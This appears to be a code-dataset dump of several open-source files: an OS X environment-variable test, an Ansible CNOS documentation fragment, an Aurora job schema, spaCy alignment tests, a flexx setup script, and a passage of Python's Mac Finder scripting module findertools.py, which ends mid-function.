repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
kmonsoor/python-for-android | python3-alpha/python3-src/Lib/test/test_osx_env.py | 59 | 1341 | """
Test suite for OS X interpreter environment variables.
"""
from test.support import EnvironmentVarGuard, run_unittest
import subprocess
import sys
import unittest
class OSXEnvironmentVariableTestCase(unittest.TestCase):
def _check_sys(self, ev, cond, sv, val = sys.executable + 'dummy'):
with EnvironmentVarGuard() as evg:
subpc = [str(sys.executable), '-c',
'import sys; sys.exit(2 if "%s" %s %s else 3)' % (val, cond, sv)]
# ensure environment variable does not exist
evg.unset(ev)
# test that test on sys.xxx normally fails
rc = subprocess.call(subpc)
self.assertEqual(rc, 3, "expected %s not %s %s" % (ev, cond, sv))
# set environ variable
evg.set(ev, val)
# test that sys.xxx has been influenced by the environ value
rc = subprocess.call(subpc)
self.assertEqual(rc, 2, "expected %s %s %s" % (ev, cond, sv))
def test_pythonexecutable_sets_sys_executable(self):
self._check_sys('PYTHONEXECUTABLE', '==', 'sys.executable')
def test_main():
from distutils import sysconfig
if sys.platform == 'darwin' and sysconfig.get_config_var('WITH_NEXT_FRAMEWORK'):
run_unittest(OSXEnvironmentVariableTestCase)
if __name__ == "__main__":
test_main()
| apache-2.0 |
alexlo03/ansible | lib/ansible/utils/module_docs_fragments/cnos.py | 25 | 3793 | # Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
class ModuleDocFragment(object):
# Standard CNOS documentation fragment
DOCUMENTATION = '''
options:
outputfile:
description:
- This specifies the file path where the output of each command
execution is saved. Each command that is specified in the merged
template file and each response from the device are saved here.
Usually the location is the results folder, but you can
choose another location based on your write permission.
required: true
version_added: 2.3
host:
description:
- This is the variable used to search the hosts file at
/etc/ansible/hosts and identify the IP address of the device on
which the template is going to be applied. Usually the Ansible
keyword {{ inventory_hostname }} is specified in the playbook as
an abstraction of the group of network elements that need to be
configured.
required: true
version_added: 2.3
username:
description:
- Configures the username used to authenticate the connection to
the remote device. The value of the username parameter is used to
authenticate the SSH session. While generally the value should
come from the inventory file, you can also specify it as a
variable. This parameter is optional. If it is not specified, no
default value will be used.
required: true
version_added: 2.3
password:
description:
- Configures the password used to authenticate the connection to
the remote device. The value of the password parameter is used to
authenticate the SSH session. While generally the value should
come from the inventory file, you can also specify it as a
variable. This parameter is optional. If it is not specified, no
default value will be used.
required: true
version_added: 2.3
enablePassword:
description:
- Configures the password used to enter Global Configuration
command mode on the switch. If the switch does not request this
password, the parameter is ignored.While generally the value
should come from the inventory file, you can also specify it as a
variable. This parameter is optional. If it is not specified,
no default value will be used.
version_added: 2.3
deviceType:
description:
- This specifies the type of device where the method is executed.
The choices NE1072T,NE1032,NE1032T,NE10032,NE2572 are added
since version 2.4. The choice NE0152T is added since 2.8
required: Yes
choices: [g8272_cnos,g8296_cnos,g8332_cnos,NE1072T,NE1032,
NE1032T,NE10032,NE2572,NE0152T]
version_added: 2.3
notes:
- For more information on using Ansible to manage Lenovo Network devices see U(https://www.ansible.com/ansible-lenovo).
'''
| gpl-3.0 |
PacktPublishing/Mastering-Mesos | Chapter4/Aurora/src/main/python/apache/aurora/config/schema/base.py | 2 | 5083 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Disable checkstyle for this entire file as it is a pystachio schema.
# checkstyle: noqa
from apache.thermos.config.schema import *
# TODO(wickman) Bind {{mesos.instance}} to %shard_id%
class MesosContext(Struct):
# The instance id (i.e. replica id, shard id) in the context of a task
instance = Required(Integer)
hostname = Required(String)
class UpdateConfig(Struct):
batch_size = Default(Integer, 1)
watch_secs = Default(Integer, 45)
max_per_shard_failures = Default(Integer, 0)
max_total_failures = Default(Integer, 0)
rollback_on_failure = Default(Boolean, True)
wait_for_batch_completion = Default(Boolean, False)
pulse_interval_secs = Integer
class HttpHealthChecker(Struct):
endpoint = Default(String, '/health')
expected_response = Default(String, 'ok')
expected_response_code = Default(Integer, 0)
class ShellHealthChecker(Struct):
shell_command = Required(String)
class HealthCheckerConfig(Struct):
http = HttpHealthChecker
shell = ShellHealthChecker
DefaultHealthChecker = HealthCheckerConfig(http=HttpHealthChecker())
class HealthCheckConfig(Struct):
health_checker = Default(HealthCheckerConfig, DefaultHealthChecker)
initial_interval_secs = Default(Float, 15.0)
interval_secs = Default(Float, 10.0)
max_consecutive_failures = Default(Integer, 0)
timeout_secs = Default(Float, 1.0)
class HttpLifecycleConfig(Struct):
# Named port to POST shutdown endpoints
port = Default(String, 'health')
# Endpoint to hit to indicate that a task should gracefully shutdown.
graceful_shutdown_endpoint = Default(String, '/quitquitquit')
# Endpoint to hit to give a task it's final warning before being killed.
shutdown_endpoint = Default(String, '/abortabortabort')
class LifecycleConfig(Struct):
http = HttpLifecycleConfig
DisableLifecycle = LifecycleConfig()
DefaultLifecycleConfig = LifecycleConfig(http = HttpLifecycleConfig())
class Announcer(Struct):
primary_port = Default(String, 'http')
# Portmap can either alias two ports together, e.g.
# aurora <= http
# Or it can be used to alias static ports to endpoints, e.g.
# http <= 80
# https <= 443
# aurora <= https
portmap = Default(Map(String, String), {
'aurora': '{{primary_port}}'
})
# Root of tree where annoucements are stored. If specified, this overrides the
# default path (executor must be started with --announcer-allow-custom-serverset-path for
# this setting to take effect)
zk_path = String
# The executorConfig populated inside of TaskConfig.
class MesosTaskInstance(Struct):
task = Required(Task)
instance = Required(Integer)
role = Required(String)
announce = Announcer
environment = Required(String)
health_check_config = Default(HealthCheckConfig, HealthCheckConfig())
lifecycle = LifecycleConfig
class Parameter(Struct):
name = Required(String)
value = Required(String)
class Docker(Struct):
image = Required(String)
parameters = Default(List(Parameter), [])
class Container(Struct):
docker = Docker
class MesosJob(Struct):
name = Default(String, '{{task.name}}')
role = Required(String)
contact = String
cluster = Required(String)
environment = Required(String)
instances = Default(Integer, 1)
task = Required(Task)
announce = Announcer
tier = String
cron_schedule = String
cron_collision_policy = Default(String, "KILL_EXISTING")
update_config = Default(UpdateConfig, UpdateConfig())
constraints = Map(String, String)
service = Default(Boolean, False)
max_task_failures = Default(Integer, 1)
production = Default(Boolean, False)
priority = Default(Integer, 0)
health_check_config = Default(HealthCheckConfig, HealthCheckConfig())
# TODO(wickman) Make Default(Any, LifecycleConfig()) once pystachio #17 is addressed.
lifecycle = Default(LifecycleConfig, DefaultLifecycleConfig)
task_links = Map(String, String) # Unsupported. See AURORA-739
enable_hooks = Default(Boolean, False) # enable client API hooks; from env python-list 'hooks'
container = Container
Job = MesosJob
Service = Job(service = True)
| mit |
lukw00/spaCy | tests/munge/test_align.py | 5 | 1085 | from spacy.util import align_tokens
def test_perfect_align():
ref = ['I', 'align', 'perfectly']
indices = []
i = 0
for token in ref:
indices.append((i, i + len(token)))
i += len(token)
aligned = list(align_tokens(ref, indices))
assert aligned[0] == ('I', [(0, 1)])
assert aligned[1] == ('align', [(1, 6)])
assert aligned[2] == ('perfectly', [(6, 15)])
def test_hyphen_align():
ref = ['I', 'must', 're-align']
indices = [(0, 1), (1, 5), (5, 7), (7, 8), (8, 13)]
aligned = list(align_tokens(ref, indices))
assert aligned[0] == ('I', [(0, 1)])
assert aligned[1] == ('must', [(1, 5)])
assert aligned[2] == ('re-align', [(5, 7), (7, 8), (8, 13)])
def test_align_continue():
ref = ['I', 'must', 're-align', 'and', 'continue']
indices = [(0, 1), (1, 5), (5, 7), (7, 8), (8, 13), (13, 16), (16, 24)]
aligned = list(align_tokens(ref, indices))
assert aligned[2] == ('re-align', [(5, 7), (7, 8), (8, 13)])
assert aligned[3] == ('and', [(13, 16)])
assert aligned[4] == ('continue', [(16, 24)])
| mit |
thezawad/flexx | setup.py | 17 | 2416 | # -*- coding: utf-8 -*-
""" Flexx setup script.
Release:
* python setup.py register
* python setup.py sdist bdist_wheel --universal upload
* build conda packages?
"""
import os
from os import path as op
try:
# use setuptools namespace, allows for "develop"
import setuptools # noqa, analysis:ignore
except ImportError:
pass # it's not essential for installation
from distutils.core import setup
name = 'flexx'
description = "Pure Python toolkit for creating GUI's using web technology."
# Get version and docstring
__version__ = None
__doc__ = ''
docStatus = 0 # Not started, in progress, done
initFile = os.path.join(os.path.dirname(__file__), name, '__init__.py')
for line in open(initFile).readlines():
if (line.startswith('version_info') or line.startswith('__version__')):
exec(line.strip())
elif line.startswith('"""'):
if docStatus == 0:
docStatus = 1
line = line.lstrip('"')
elif docStatus == 1:
docStatus = 2
if docStatus == 1:
__doc__ += line
def package_tree(pkgroot):
path = os.path.dirname(__file__)
subdirs = [os.path.relpath(i[0], path).replace(os.path.sep, '.')
for i in os.walk(os.path.join(path, pkgroot))
if '__init__.py' in i[2]]
return subdirs
setup(
name=name,
version=__version__,
author='Flexx contributors',
author_email='almar.klein@gmail.com',
license='(new) BSD',
url='http://flexx.readthedocs.org',
download_url='https://pypi.python.org/pypi/flexx',
keywords="ui design, web runtime, pyscript, reactive programming, FRP",
description=description,
long_description=__doc__,
platforms='any',
provides=[name],
install_requires=[],
packages=package_tree(name),
package_dir={name: name},
package_data={},
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
#'Programming Language :: Python :: 2.7', # not yet supported
'Programming Language :: Python :: 3.4',
],
)
| bsd-2-clause |
CamelBackNotation/CarnotKE | jyhton/lib-python/2.7/plat-mac/findertools.py | 29 | 30176 | """Utility routines depending on the finder,
a combination of code by Jack Jansen and erik@letterror.com.
Most events have been captured from
Lasso Capture AE and than translated to python code.
IMPORTANT
Note that the processes() function returns different values
depending on the OS version it is running on. On MacOS 9
the Finder returns the process *names* which can then be
used to find out more about them. On MacOS 8.6 and earlier
the Finder returns a code which does not seem to work.
So bottom line: the processes() stuff does not work on < MacOS9
Mostly written by erik@letterror.com
"""
from warnings import warnpy3k
warnpy3k("In 3.x, the findertools module is removed.", stacklevel=2)
import Finder
from Carbon import AppleEvents
import aetools
import MacOS
import sys
import Carbon.File
import Carbon.Folder
import aetypes
from types import *
__version__ = '1.1'
Error = 'findertools.Error'
_finder_talker = None
def _getfinder():
"""returns basic (recyclable) Finder AE interface object"""
global _finder_talker
if not _finder_talker:
_finder_talker = Finder.Finder()
_finder_talker.send_flags = ( _finder_talker.send_flags |
AppleEvents.kAECanInteract | AppleEvents.kAECanSwitchLayer)
return _finder_talker
def launch(file):
"""Open a file thru the finder. Specify file by name or fsspec"""
finder = _getfinder()
fss = Carbon.File.FSSpec(file)
return finder.open(fss)
def Print(file):
"""Print a file thru the finder. Specify file by name or fsspec"""
finder = _getfinder()
fss = Carbon.File.FSSpec(file)
return finder._print(fss)
def copy(src, dstdir):
"""Copy a file to a folder"""
finder = _getfinder()
if type(src) == type([]):
src_fss = []
for s in src:
src_fss.append(Carbon.File.FSSpec(s))
else:
src_fss = Carbon.File.FSSpec(src)
dst_fss = Carbon.File.FSSpec(dstdir)
return finder.duplicate(src_fss, to=dst_fss)
def move(src, dstdir):
"""Move a file to a folder"""
finder = _getfinder()
if type(src) == type([]):
src_fss = []
for s in src:
src_fss.append(Carbon.File.FSSpec(s))
else:
src_fss = Carbon.File.FSSpec(src)
dst_fss = Carbon.File.FSSpec(dstdir)
return finder.move(src_fss, to=dst_fss)
def sleep():
"""Put the mac to sleep"""
finder = _getfinder()
finder.sleep()
def shutdown():
"""Shut the mac down"""
finder = _getfinder()
finder.shut_down()
def restart():
"""Restart the mac"""
finder = _getfinder()
finder.restart()
#---------------------------------------------------
# Additional findertools
#
def reveal(file):
"""Reveal a file in the finder. Specify file by name, fsref or fsspec."""
finder = _getfinder()
fsr = Carbon.File.FSRef(file)
file_alias = fsr.FSNewAliasMinimal()
return finder.reveal(file_alias)
def select(file):
"""select a file in the finder. Specify file by name, fsref or fsspec."""
finder = _getfinder()
fsr = Carbon.File.FSRef(file)
file_alias = fsr.FSNewAliasMinimal()
return finder.select(file_alias)
def update(file):
"""Update the display of the specified object(s) to match
their on-disk representation. Specify file by name, fsref or fsspec."""
finder = _getfinder()
fsr = Carbon.File.FSRef(file)
file_alias = fsr.FSNewAliasMinimal()
return finder.update(file_alias)
#---------------------------------------------------
# More findertools
#
def comment(object, comment=None):
"""comment: get or set the Finder-comment of the item, displayed in the 'Get Info' window."""
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
if comment is None:
return _getcomment(object_alias)
else:
return _setcomment(object_alias, comment)
def _setcomment(object_alias, comment):
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('comt'), fr=aeobj_00)
args['----'] = aeobj_01
args["data"] = comment
_reply, args, attrs = finder.send("core", "setd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _getcomment(object_alias):
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('comt'), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
#---------------------------------------------------
# Get information about current processes in the Finder.
def processes():
"""processes returns a list of all active processes running on this computer and their creators."""
finder = _getfinder()
args = {}
attrs = {}
processnames = []
processnumbers = []
creators = []
partitions = []
used = []
## get the processnames or else the processnumbers
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prcs'), form="indx", seld=aetypes.Unknown('abso', "all "), fr=None)
_reply, args, attrs = finder.send('core', 'getd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
p = []
if '----' in args:
p = args['----']
for proc in p:
if hasattr(proc, 'seld'):
# it has a real name
processnames.append(proc.seld)
elif hasattr(proc, 'type'):
if proc.type == "psn ":
# it has a process number
processnumbers.append(proc.data)
## get the creators
args = {}
attrs = {}
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('prcs'), form="indx", seld=aetypes.Unknown('abso', "all "), fr=None)
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('fcrt'), fr=aeobj_0)
_reply, args, attrs = finder.send('core', 'getd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(_arg)
if '----' in args:
p = args['----']
creators = p[:]
## concatenate in one dict
result = []
if len(processnames) > len(processnumbers):
data = processnames
else:
data = processnumbers
for i in range(len(creators)):
result.append((data[i], creators[i]))
return result
class _process:
pass
def isactiveprocess(processname):
"""Check of processname is active. MacOS9"""
all = processes()
ok = 0
for n, c in all:
if n == processname:
return 1
return 0
def processinfo(processname):
"""Return an object with all process properties as attributes for processname. MacOS9"""
p = _process()
if processname == "Finder":
p.partition = None
p.used = None
else:
p.partition = _processproperty(processname, 'appt')
p.used = _processproperty(processname, 'pusd')
p.visible = _processproperty(processname, 'pvis') #Is the process' layer visible?
p.frontmost = _processproperty(processname, 'pisf') #Is the process the frontmost process?
p.file = _processproperty(processname, 'file') #the file from which the process was launched
p.filetype = _processproperty(processname, 'asty') #the OSType of the file type of the process
p.creatortype = _processproperty(processname, 'fcrt') #the OSType of the creator of the process (the signature)
p.accepthighlevel = _processproperty(processname, 'revt') #Is the process high-level event aware (accepts open application, open document, print document, and quit)?
p.hasscripting = _processproperty(processname, 'hscr') #Does the process have a scripting terminology, i.e., can it be scripted?
return p
def _processproperty(processname, property):
"""return the partition size and memory used for processname"""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('prcs'), form="name", seld=processname, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type(property), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
#---------------------------------------------------
# Mess around with Finder windows.
def openwindow(object):
"""Open a Finder window for object, Specify object by name or fsspec."""
finder = _getfinder()
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
args = {}
attrs = {}
_code = 'aevt'
_subcode = 'odoc'
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=object_alias, fr=None)
args['----'] = aeobj_0
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
def closewindow(object):
"""Close a Finder window for folder, Specify by path."""
finder = _getfinder()
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
args = {}
attrs = {}
_code = 'core'
_subcode = 'clos'
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=object_alias, fr=None)
args['----'] = aeobj_0
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
def location(object, pos=None):
"""Set the position of a Finder window for folder to pos=(w, h). Specify file by name or fsspec.
If pos=None, location will return the current position of the object."""
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
if not pos:
return _getlocation(object_alias)
return _setlocation(object_alias, pos)
def _setlocation(object_alias, (x, y)):
"""_setlocation: Set the location of the icon for the object."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('posn'), fr=aeobj_00)
args['----'] = aeobj_01
args["data"] = [x, y]
_reply, args, attrs = finder.send("core", "setd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
return (x,y)
def _getlocation(object_alias):
"""_getlocation: get the location of the icon for the object."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('posn'), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
pos = args['----']
return pos.h, pos.v
def label(object, index=None):
"""label: set or get the label of the item. Specify file by name or fsspec."""
object = Carbon.File.FSRef(object)
object_alias = object.FSNewAliasMinimal()
if index is None:
return _getlabel(object_alias)
if index < 0 or index > 7:
index = 0
return _setlabel(object_alias, index)
def _getlabel(object_alias):
"""label: Get the label for the object."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'), form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('labi'), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _setlabel(object_alias, index):
"""label: Set the label for the object."""
finder = _getfinder()
args = {}
attrs = {}
_code = 'core'
_subcode = 'setd'
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="alis", seld=object_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('labi'), fr=aeobj_0)
args['----'] = aeobj_1
args["data"] = index
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
return index
def windowview(folder, view=None):
"""windowview: Set the view of the window for the folder. Specify file by name or fsspec.
0 = by icon (default)
1 = by name
2 = by button
"""
fsr = Carbon.File.FSRef(folder)
folder_alias = fsr.FSNewAliasMinimal()
if view is None:
return _getwindowview(folder_alias)
return _setwindowview(folder_alias, view)
def _setwindowview(folder_alias, view=0):
"""set the windowview"""
attrs = {}
args = {}
if view == 1:
_v = aetypes.Type('pnam')
elif view == 2:
_v = aetypes.Type('lgbu')
else:
_v = aetypes.Type('iimg')
finder = _getfinder()
aeobj_0 = aetypes.ObjectSpecifier(want = aetypes.Type('cfol'),
form = 'alis', seld = folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want = aetypes.Type('prop'),
form = 'prop', seld = aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want = aetypes.Type('prop'),
form = 'prop', seld = aetypes.Type('pvew'), fr=aeobj_1)
aeobj_3 = aetypes.ObjectSpecifier(want = aetypes.Type('prop'),
form = 'prop', seld = _v, fr=None)
_code = 'core'
_subcode = 'setd'
args['----'] = aeobj_2
args['data'] = aeobj_3
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _getwindowview(folder_alias):
"""get the windowview"""
attrs = {}
args = {}
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'), form="alis", seld=folder_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_00)
aeobj_02 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('pvew'), fr=aeobj_01)
args['----'] = aeobj_02
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
views = {'iimg':0, 'pnam':1, 'lgbu':2}
if '----' in args:
return views[args['----'].enum]
def windowsize(folder, size=None):
"""Set the size of a Finder window for folder to size=(w, h), Specify by path.
If size=None, windowsize will return the current size of the window.
Specify file by name or fsspec.
"""
fsr = Carbon.File.FSRef(folder)
folder_alias = fsr.FSNewAliasMinimal()
openwindow(fsr)
if not size:
return _getwindowsize(folder_alias)
return _setwindowsize(folder_alias, size)
def _setwindowsize(folder_alias, (w, h)):
"""Set the size of a Finder window for folder to (w, h)"""
finder = _getfinder()
args = {}
attrs = {}
_code = 'core'
_subcode = 'setd'
aevar00 = [w, h]
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'),
form="alis", seld=folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('ptsz'), fr=aeobj_1)
args['----'] = aeobj_2
args["data"] = aevar00
_reply, args, attrs = finder.send(_code, _subcode, args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
return (w, h)
def _getwindowsize(folder_alias):
"""Set the size of a Finder window for folder to (w, h)"""
finder = _getfinder()
args = {}
attrs = {}
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'),
form="alis", seld=folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('posn'), fr=aeobj_1)
args['----'] = aeobj_2
_reply, args, attrs = finder.send('core', 'getd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def windowposition(folder, pos=None):
"""Set the position of a Finder window for folder to pos=(w, h)."""
fsr = Carbon.File.FSRef(folder)
folder_alias = fsr.FSNewAliasMinimal()
openwindow(fsr)
if not pos:
return _getwindowposition(folder_alias)
if type(pos) == InstanceType:
# pos might be a QDPoint object as returned by _getwindowposition
pos = (pos.h, pos.v)
return _setwindowposition(folder_alias, pos)
def _setwindowposition(folder_alias, (x, y)):
"""Set the size of a Finder window for folder to (w, h)."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'),
form="alis", seld=folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('posn'), fr=aeobj_1)
args['----'] = aeobj_2
args["data"] = [x, y]
_reply, args, attrs = finder.send('core', 'setd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _getwindowposition(folder_alias):
"""Get the size of a Finder window for folder, Specify by path."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_0 = aetypes.ObjectSpecifier(want=aetypes.Type('cfol'),
form="alis", seld=folder_alias, fr=None)
aeobj_1 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('cwnd'), fr=aeobj_0)
aeobj_2 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('ptsz'), fr=aeobj_1)
args['----'] = aeobj_2
_reply, args, attrs = finder.send('core', 'getd', args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def icon(object, icondata=None):
"""icon sets the icon of object, if no icondata is given,
icon will return an AE object with binary data for the current icon.
If left untouched, this data can be used to paste the icon on another file.
Development opportunity: get and set the data as PICT."""
fsr = Carbon.File.FSRef(object)
object_alias = fsr.FSNewAliasMinimal()
if icondata is None:
return _geticon(object_alias)
return _seticon(object_alias, icondata)
def _geticon(object_alias):
"""get the icondata for object. Binary data of some sort."""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'),
form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('iimg'), fr=aeobj_00)
args['----'] = aeobj_01
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def _seticon(object_alias, icondata):
"""set the icondata for object, formatted as produced by _geticon()"""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('cobj'),
form="alis", seld=object_alias, fr=None)
aeobj_01 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'),
form="prop", seld=aetypes.Type('iimg'), fr=aeobj_00)
args['----'] = aeobj_01
args["data"] = icondata
_reply, args, attrs = finder.send("core", "setd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----'].data
#---------------------------------------------------
# Volumes and servers.
def mountvolume(volume, server=None, username=None, password=None):
"""mount a volume, local or on a server on AppleTalk.
Note: mounting a ASIP server requires a different operation.
server is the name of the server where the volume belongs
username, password belong to a registered user of the volume."""
finder = _getfinder()
args = {}
attrs = {}
if password:
args["PASS"] = password
if username:
args["USER"] = username
if server:
args["SRVR"] = server
args['----'] = volume
_reply, args, attrs = finder.send("aevt", "mvol", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def unmountvolume(volume):
"""unmount a volume that's on the desktop"""
putaway(volume)
def putaway(object):
"""puth the object away, whereever it came from."""
finder = _getfinder()
args = {}
attrs = {}
args['----'] = aetypes.ObjectSpecifier(want=aetypes.Type('cdis'), form="name", seld=object, fr=None)
_reply, args, attrs = talker.send("fndr", "ptwy", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
#---------------------------------------------------
# Miscellaneous functions
#
def volumelevel(level):
"""set the audio output level, parameter between 0 (silent) and 7 (full blast)"""
finder = _getfinder()
args = {}
attrs = {}
if level < 0:
level = 0
elif level > 7:
level = 7
args['----'] = level
_reply, args, attrs = finder.send("aevt", "stvl", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def OSversion():
"""return the version of the system software"""
finder = _getfinder()
args = {}
attrs = {}
aeobj_00 = aetypes.ObjectSpecifier(want=aetypes.Type('prop'), form="prop", seld=aetypes.Type('ver2'), fr=None)
args['----'] = aeobj_00
_reply, args, attrs = finder.send("core", "getd", args, attrs)
if 'errn' in args:
raise Error, aetools.decodeerror(args)
if '----' in args:
return args['----']
def filesharing():
"""return the current status of filesharing and whether it is starting up or not:
-1 file sharing is off and not starting up
0 file sharing is off and starting up
1 file sharing is on"""
status = -1
finder = _getfinder()
# see if it is on
args = {}
